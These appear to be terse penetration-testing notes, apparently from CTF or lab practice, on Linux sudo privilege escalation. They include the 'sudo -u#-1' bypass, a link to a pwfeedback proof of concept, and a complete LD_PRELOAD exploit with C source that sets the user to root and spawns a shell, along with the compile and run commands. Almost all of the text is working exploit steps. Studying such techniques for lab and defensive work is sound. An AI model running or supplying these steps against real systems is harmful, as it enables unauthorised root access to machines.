sudo escalation path

sudo -u#-1 /bin/bash

GTFOBins

when pwfeedback is enabled we can run the following exploit:

GitHub - saleemrashid/sudo-cve-2019-18634: Proof of Concept for CVE-2019-18634GitHub

1. In command prompt type: sudo -l

2. From the output, notice that the LD_PRELOAD environment variable is intact.

Exploitation

1. Open a text editor and type:

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/bash");

}

2. Save the file as x.c

3. In command prompt type:

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

4. In command prompt type:

sudo LD_PRELOAD=/tmp/x.so apache2

5. In command prompt type: id

INTENDED FUNCTIONALITY

wget example - https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/